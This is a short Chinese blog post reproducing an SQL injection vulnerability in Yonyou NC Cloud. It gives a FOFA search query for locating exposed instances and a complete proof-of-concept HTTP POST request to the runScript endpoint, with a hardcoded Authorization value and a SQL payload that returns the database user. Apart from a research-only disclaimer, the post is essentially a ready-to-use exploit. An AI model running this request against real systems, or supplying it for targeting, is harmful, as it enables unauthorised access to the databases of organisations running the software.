【漏洞复现】用友NC Cloud 存在SQL注入

原创于 2024-03-25 02:02:20 发布 · 398 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#安全 #web安全 #网络安全

漏洞复现专栏收录该内容

17 篇文章

订阅专栏

声明：亲爱的读者，我们诚挚地提醒您，Aniya网络安全的技术文章仅供个人研究学习参考。任何因传播或利用本实验室提供的信息而造成的直接或间接后果及损失，均由使用者自行承担责任。Aniya网络安全及作者对此概不负责。如有侵权，请立即告知，我们将立即删除并致歉。感谢您的理解与支持！

0x01FOFA语句

FOFA：app="用友-NC-Cloud"

0x02 漏洞POC

POST /ncchr/attendScript/internal/runScript HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Language: en
Authorization: 58e00466213416018d01d15de83b0198
Accept-Encoding: gzip
 
key=1&script=select 1,111*111,user,4,5,6,7,8,9,10 from dual